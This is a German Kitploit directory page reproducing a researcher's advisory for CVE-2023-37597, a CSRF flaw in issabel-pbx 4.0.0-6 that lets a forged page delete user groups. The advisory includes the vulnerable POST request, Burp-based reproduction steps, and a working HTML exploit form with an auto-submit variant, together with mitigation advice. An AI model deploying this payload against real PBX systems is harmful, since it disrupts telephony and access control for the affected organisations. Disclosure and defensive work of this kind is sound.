Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-37597 — Issabel-pbx v 4.0.0-6 enthält eine Cross-Site Request Forgery (CSRF)-Sicherheitslücke in der Benutzergruppenverwaltung. | Kitploit
Tools/GitHubGitHub/sahiloj/cve-2023-37597
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsPapers & ForschungLernen & Bildung
GitHubsahiloj/cve-2023-37597

CVE-2023-37597

Issabel-pbx v 4.0.0-6 enthält eine Cross-Site Request Forgery (CSRF)-Sicherheitslücke in der Benutzergruppenverwaltung.

Repository anzeigen
11vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-37597 — issabel-pbx 4.0.0-6: Cross-Site-Request-Forgery (CSRF) — Benutzergruppe löschen

Haftungsausschluss: Dieses Repository dient ausschließlich zu Bildungs- und autorisierten Sicherheitsforschungszwecken. Verwenden Sie diesen Exploit nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche schriftliche Erlaubnis zum Testen haben.


Inhaltsverzeichnis

  • Übersicht
  • Schwachstellendetails
  • Betroffenes Produkt
  • Technische Analyse
  • Angriffsszenario
  • Proof of Concept (PoC)
    • Schritte zur Reproduktion
    • PoC-Exploit-Code
  • Auswirkungen
  • Minderung & Abhilfe
  • Offenlegungszeitplan
  • Referenzen
  • Autor

Übersicht

issabel-pbx ist eine weit verbreitete Open-Source-Plattform für Unified Communications (PBX), die VoIP-Dienste, Telefonieverwaltung und webbasierte Administration bereitstellt. Version 4.0.0-6 von issabel-pbx enthält eine -Schwachstelle in der Benutzergruppenverwaltung.

Cross-Site-Request-Forgery (CSRF)

Ein nicht authentifizierter entfernter Angreifer kann eine schädliche HTML-Seite erstellen, die, wenn sie von einem authentifizierten Administrator besucht wird, stillschweigend eine gefälschte HTTP-POST-Anfrage zum Löschen einer beliebigen Benutzergruppe sendet. Da die Anwendung die Herkunft von zustandsändernden Anfragen nicht mit CSRF-Tokens oder SameSite-Cookie-Richtlinien validiert, sendet der Browser automatisch das Sitzungscookie des Administrators mit, wodurch die Löschung ohne Wissen oder Zustimmung des Opfers erfolgreich ist.


Schwachstellendetails

FeldWert
CVE-IDCVE-2023-37597
SchwachstelleCross-Site-Request-Forgery (CSRF)
CWECWE-352 — Cross-Site-Request-Forgery (CSRF)
SchweregradMittel
CVSS-VektorCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
Betroffene Versionissabel-pbx 4.0.0-6
Offengelegt10. Juli 2023
ForscherSahil Ojha

Betroffenes Produkt

FeldWert
Produktnameissabel-pbx
Version4.0.0-6
AnbieterIssabel Foundation
Anbieterseitehttps://www.issabel.org/
Quellcodehttps://github.com/IssabelFoundation/issabelPBX
Getestet aufWindows (Burp Suite Community Edition)

Technische Analyse

Was ist CSRF?

Cross-Site-Request-Forgery (CSRF) ist ein Angriff, bei dem der Browser eines Opfers dazu gebracht wird, eine authentifizierte Anfrage im Namen des Angreifers an eine Zielanwendung zu senden. Der Angriff gelingt, wenn:

  1. Das Opfer eine aktive authentifizierte Sitzung mit der Zielanwendung hat.
  2. Die Anwendung sich ausschließlich auf Sitzungscookies zur Authentifizierung von Anfragen verlässt (d.h. kein CSRF-Token, keine Origin/Referer-Validierung, kein SameSite=Strict oder SameSite=Lax-Cookie-Attribut).
  3. Der Angreifer die Struktur der zustandsändernden Anfrage vorhersagen kann.

Grundursache

Der Benutzergruppe löschen-Endpunkt (/index.php?menu=grouplist) in issabel-pbx 4.0.0-6 verarbeitet HTTP-POST-Anfragen, die nur die Aktion delete und einen Parameter id_user enthalten. Die Anwendung führt nicht folgendes durch:

  • Generierung oder Validierung eines Synchronisierer-Tokens (Anti-CSRF-Token).
  • Überprüfung der Origin- oder Referer-HTTP-Header.
  • Setzen des SameSite-Attributs auf Sitzungscookies.

Infolgedessen kann jede im Browser des Opfers geladene Webseite das Löschformular stillschweigend unter Verwendung der vorhandenen Sitzung des Opfers absenden, da der Browser automatisch das Sitzungscookie anhängt.

Gefährdeter Endpunkt

root@kitploit:~
POST /index.php?menu=grouplist HTTP/1.1
Host: <Issabel IP>

delete=Delete&id_user=<USER_GROUP_ID>

Angriffsszenario

  1. Der Angreifer erstellt eine schädliche HTML-Seite mit einem versteckten Formular, das die Löschanfrage an das Issabel-Admin-Panel POSTet.
  2. Der Angreifer liefert die Seite an einen authentifizierten Issabel-Administrator – per Phishing-E-Mail, einen Link in einer Chatnachricht oder ein eingebettetes `` auf einer kompromittierten Seite.
  3. Der Browser des Opfers lädt die Seite. JavaScript sendet das Formular automatisch ab, oder das Opfer wird durch Social Engineering dazu gebracht, auf eine gefälschte "Senden"-Schaltfläche zu klicken.
  4. Der Issabel-Server empfängt eine gültige POST-Anfrage mit dem Sitzungscookie des Administrators und löscht die Zielbenutzergruppe ohne zusätzliche Bestätigung oder Token-Validierung.
  5. Die Benutzergruppe wird dauerhaft entfernt, was möglicherweise Anrufweiterleitungen, Zugriffskontrollen und alle Benutzer, die von dieser Gruppe abhängig waren, stört – was effektiv einen Denial-of-Service auf Anwendungsebene verursacht.

Proof of Concept (PoC)

Warnung: Der folgende PoC wird ausschließlich zu Bildungszwecken bereitgestellt. Verwenden Sie ihn nur in Laborumgebungen oder Systemen, für die Sie ausdrückliche Autorisierung haben.

Schritte zur Reproduktion

Schritt 1 – Melden Sie sich im Issabel-Admin-Panel an

Navigieren Sie zur Benutzergruppenliste und melden Sie sich mit Administrator-Anmeldedaten an.

root@kitploit:~
https://{Issabel IP}/index.php?menu=grouplist&action=view&id=11

Admin-Panel — Benutzergruppenliste


Schritt 2 – Erfassen Sie die Löschanfrage

Versuchen Sie, eine Benutzergruppe zu löschen, während Sie den Datenverkehr durch Burp Suite leiten. Klicken Sie mit der rechten Maustaste auf die erfasste POST-Anfrage und wählen Sie Engagement Tools → Generate CSRF PoC, um das Exploit-HTML-Grundgerüst zu erstellen.

Burp Suite — Erfasste DELETE-Anfrage


Schritt 3 – Hosting der CSRF-Exploit-Seite

Speichern Sie das generierte HTML als Datei (siehe PoC-Exploit-Code unten). Hosten Sie es auf einem angreiferkontrollierten Server oder senden Sie es direkt an das Opfer.


Schritt 4 – Das Opfer öffnet die Exploit-Seite

Wenn der authentifizierte Administrator die Exploit-URL öffnet oder dorthin umgeleitet wird, wird das versteckte Formular automatisch gesendet (oder das Opfer klickt auf den Köder-Button). Die Zielbenutzergruppe wird aus dem Admin-Panel gelöscht.

Exploit abgesendet — Gruppe gelöscht (vorher)

Exploit abgesendet — Gruppe gelöscht (nachher)


PoC-Exploit-Code

Die folgende HTML-Datei (auch verfügbar als CSRF exploit.html) demonstriert den Angriff. Ersetzen Sie {Issabel IP} durch den Zielhost und passen Sie id_user an die zu löschende Gruppen-ID an.

root@kitploit:~
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://{Issabel IP}/index.php?menu=grouplist" method="POST">
      <input type="hidden" name="delete" value="Delete" />
      <input type="hidden" name="id_user" value="7" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Variante mit automatischem Absenden: Um zu vermeiden, dass das Opfer etwas anklicken muss, fügen Sie Folgendes innerhalb des <body>-Tags hinzu, sodass das Formular beim Seitenladen automatisch abgesendet wird:

root@kitploit:~
<script>document.forms[0].submit();</script>

Auswirkungen

DimensionBeschreibung
IntegritätEin Angreifer kann stillschweigend jede Benutzergruppe aus dem Issabel-Admin-Panel löschen.
VerfügbarkeitDas Löschen von Benutzergruppen stört Anrufweiterleitungsregeln, Zugriffskontrolle und Telefoniedienste für alle Benutzer dieser Gruppen, was einem teilweisen Denial-of-Service gleichkommt.
VertraulichkeitNicht direkt von dieser Schwachstelle betroffen.

Minderung & Abhilfe

Administratoren und Entwickler sollten die folgenden Verteidigungsmaßnahmen anwenden:

  1. Implementieren Sie CSRF-Tokens (Synchronisierer-Token-Muster)

    • Generieren Sie ein eindeutiges, unvorhersehbares, pro-Sitzung (oder pro-Anfrage) Token für jedes zustandsändernde Formular.
    • Validieren Sie das Token serverseitig, bevor Sie eine POST/PUT/DELETE-Operation verarbeiten.
  2. Setzen Sie das SameSite-Cookie-Attribut

    • Setzen Sie Sitzungscookies mit SameSite=Lax (mindestens) oder SameSite=Strict, um zu verhindern, dass standortübergreifende Anfragen Sitzungsanmeldeinformationen mitführen.
    • Beispiel-Response-Header: Set-Cookie: PHPSESSID=...; SameSite=Lax; Secure; HttpOnly
  3. Validieren Sie Origin- und Referer-Header

    • Serverseitig Anfragen ablehnen, deren Origin- oder Referer-Header nicht mit der eigenen Domain der Anwendung übereinstimmen.
  4. Erneute Authentifizierung für destruktive Aktionen anfordern

    • Fordern Sie den Administrator auf, sein Passwort zu bestätigen, bevor Gruppen gelöscht oder andere destruktive Operationen durchgeführt werden.
  5. Defense-in-Depth anwenden

    • Verwenden Sie eine Web Application Firewall (WAF)-Regel, um unerwartete standortübergreifende POST-Anfragen an sensible Endpunkte zu blockieren.

Offenlegungszeitplan

DatumEreignis
10. Juli 2023Schwachstelle von Sahil Ojha entdeckt und dokumentiert
10. Juli 2023CVE-2023-37597 zugewiesen
10. Juli 2023Öffentliche Offenlegung

Referenzen

  • NVD — CVE-2023-37597
  • OWASP — Cross-Site-Request-Forgery (CSRF)
  • OWASP CSRF Prevention Cheat Sheet
  • CWE-352: Cross-Site-Request-Forgery (CSRF)
  • Issabel Foundation — issabelPBX

Autor

Sahil Ojha Sicherheitsforscher

Wenn Sie diese Forschung nützlich fanden, können Sie das Repository gerne ⭐-starren.

Tool herunterladen